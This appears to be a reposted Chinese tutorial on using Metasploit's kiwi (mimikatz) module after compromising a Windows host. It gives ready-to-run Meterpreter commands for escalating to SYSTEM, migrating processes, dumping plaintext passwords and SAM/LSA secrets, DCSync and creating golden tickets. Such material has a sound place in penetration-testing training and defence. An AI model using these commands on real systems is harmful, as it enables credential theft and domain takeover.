文章目錄
- 一、簡介:
- 二、前提:
- 1.?提權到system權限:
- 1.1?提到system有兩個方法:
- 1.2?進行提權:
- 2.?行程遷移:
- 三、kiwi模塊的使用:
- 1.?creds_all:
- 2.?kiwi_cmd:
一、簡介:
kiwi模塊:
??mimikatz模塊已經合并為kiwi模塊;使用kiwi模塊需要system權限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system,
二、前提:
1.?提權到system權限:
1.1?提到system有兩個方法:
??一是當前的權限是administrator用戶;
??二是利用其它手段先提權到administrator用戶,然后administrator用戶可以直接在meterpreter_shell中使用命令getsystem提權到system權限,
1.2?進行提權:
命令:
getuid #查看當前會話用戶身份
getsystem #自動嘗試提權
2.?行程遷移:
??kiwi模塊同時支持32位和64位的系統,但是該模塊默認是加載32位的系統,所以如果目標主機是64位系統的話,直接默認加載該模塊會導致很多功能無法使用,
??所以如果目標系統是64位的,則必須先查看系統行程串列,然后將meterpreter行程遷移到一個64位程式的行程中,才能加載kiwi并且查看系統明文,如果目標系統是32位的,則沒有這個限制,
1、查看當前系統資訊,可以看出目標系統是64位的:
命令:
sysinfo #查看當前系統資訊
2、查看行程資訊:
命令:
ps #查看行程
3、把行程遷移到PID為504這個程式中(因為當前用戶):
注:因為目標系統是64位的所以需要把meterpreter行程遷移到一個64位程式的行程中,
命令:
migrate [PID]
三、kiwi模塊的使用:
load kiwi #加載kiwi模塊
help kiwi #查看kiwi模塊的使用
一些有關密碼和憑據的命令:
creds_all: #列舉所有憑據
creds_kerberos: #列舉所有kerberos憑據
creds_msv: #列舉所有msv憑據
creds_ssp: #列舉所有ssp憑據
creds_tspkg: #列舉所有tspkg憑據
creds_wdigest: #列舉所有wdigest憑據
dcsync: #通過DCSync檢索用戶帳戶資訊
dcsync_ntlm: #通過DCSync檢索用戶帳戶NTLM散列、SID和RID
golden_ticket_create: #創建黃金票據
kerberos_ticket_list: #列舉kerberos票據
kerberos_ticket_purge: #清除kerberos票據
kerberos_ticket_use: #使用kerberos票據
kiwi_cmd: #執行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam: #dump出lsa的SAM
lsa_dump_secrets: #dump出lsa的密文
password_change: #修改密碼
wifi_list: #列出當前用戶的wifi組態檔
wifi_list_shared: #列出共享wifi組態檔/編碼
1.?creds_all:
該命令可以列舉系統中的明文密碼:
命令:
creds_all #列舉所有憑據
2.?kiwi_cmd:
kiwi_cmd 模塊可以讓我們使用mimikatz的全部功能,該命令后面接 mimikatz.exe 的命令:
kiwi_cmd sekurlsa::logonpasswords
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/292634.html
標籤:其他
上一篇:Billu_b0x靶機滲透